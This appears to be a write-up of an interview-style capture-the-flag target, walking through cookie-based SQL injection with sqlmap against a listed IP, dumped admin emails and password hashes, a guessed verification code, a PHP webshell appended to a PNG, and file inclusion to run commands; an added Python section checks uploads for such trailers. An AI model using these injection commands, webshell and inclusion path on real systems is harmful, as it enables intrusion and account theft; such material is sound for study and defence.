A friend had an interview that included a hands-on practical question. I found the same question on the public internet and record it here.
Opening the question link shows the following:
Clicking the about page reveals some hints.
It says that directory scanning is required; running dirsearch against the site discovers some files.
Access robots.txt to check whether it exposes anything sensitive.
It hints at /1234, but accessing that path returns a 404.
This website's robots.txt has since been changed; from the robots.txt of the friend's interview target machine, the content is known to be Company_admin/login.php, which is the backend of this website.
The backend requires an email, a password, and a four-digit verification code. A quick brute-force attempt shows that the verification code changes every time the page is refreshed, so brute-forcing the form is not feasible.
The about.php page of the interview target machine also hints at "sqli", i.e. SQL injection, so there is evidently an SQL injection vulnerability somewhere on the site.
Clicking the blog on the homepage shows an id parameter; test it for SQL injection.
There is a hint here: "about my password".
Running sqlmap directly against the injection point does not retrieve any content.
Testing shows that the injection point is actually in the cookie.
Run sqlmap directly:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables
There are five tables.
Read the table contents:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin --columns
When dumping the columns of the admin table with sqlmap, it keeps reporting an error, so manual injection is used here.
Five accounts are obtained:
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
The plaintext password of [email protected] is asdqwe123.
Now only the four-digit verification code remains. Since brute-forcing is not possible, the about page's hint about "some social engineering" applies.
The blog section of the interview target machine has two articles; one of them is a birthday wish the author wrote to themselves, giving the birthday date 2019-10-27.
Trying it, the login succeeds with 1027.
The login page is as follows:
The Blog-create post section has an upload point. Testing shows that it uses a whitelist which only allows image-format extensions.
Check whether there is a file inclusion vulnerability: if so, a webshell embedded in an image can be included and commands executed through it.
The access-language section has a very familiar parameter: "?template=".
Direct file inclusion works. With everything in place, prepare the image shell.
Create the image shell by preparing a php file and a png file:
cat 1.php >> 1.png
Testing shows that the webshell uploaded to this target machine cannot be reached through GET or POST parameters. As with the SQL injection, it only works through a cookie parameter, which is then used to execute commands.
First, prepare the following webshell file:
<?php system($_COOKIE['a']);?>
Then use the method above to create the image shell; the generated image is shown in the figure below.
Go back to the blog creation page and upload the image shell.
The uploaded file's address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.
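The upload check above only looks at the extension, which is why a PNG with PHP appended after its IEND chunk passes. The following added example (not part of the writeup, and not the target's code) is a server-side check a defender can run on uploaded images: it walks the PNG chunk structure, reports any bytes trailing the IEND chunk, and flags a PHP open tag. The sample files are constructed inline; the appended tag is a harmless echo, not the writeup's shell.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_trailing_data(data: bytes) -> bytes:
    """Walk the PNG chunk list and return whatever follows the IEND chunk.

    A file built with `cat shell.php >> image.png` still decodes as an image,
    because decoders stop at IEND; the payload sits after it. Raises
    ValueError if the data is not a PNG or its chunk structure is broken.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + payload + 4 CRC
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        if ctype == b"IEND":
            return data[end:]
        pos = end
    raise ValueError("no IEND chunk")


def looks_like_php(blob: bytes) -> bool:
    """Cheap indicator: a PHP open tag anywhere in the blob."""
    return b"<?php" in blob.lower()


def check_upload(data: bytes) -> dict:
    """Findings for a file that already passed an extension whitelist."""
    trailing = png_trailing_data(data)
    return {
        "trailing_bytes": len(trailing),
        "php_tag_in_trailer": looks_like_php(trailing),
        "php_tag_anywhere": looks_like_php(data),
    }


def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    body = ctype + payload
    crc = zlib.crc32(body) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", crc)


# Constructed samples: a 1x1 greyscale PNG, and the same file with a benign
# PHP tag appended the way the writeup's `cat 1.php >> 1.png` appends a shell.
CLEAN_PNG = (PNG_SIG
             + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + png_chunk(b"IDAT", zlib.compress(b"\x00\x80"))
             + png_chunk(b"IEND", b""))
POLYGLOT_PNG = CLEAN_PNG + b"<?php echo 'appended'; ?>\n"
```

Re-encoding every accepted image through an image library (which writes a fresh file and drops the trailer) is the simpler fix; this check is for auditing uploads that were stored as received.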
File inclusion: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png.
Capture this request with Burp and execute commands through the cookie.
Start looking for the flag.
The flag is found.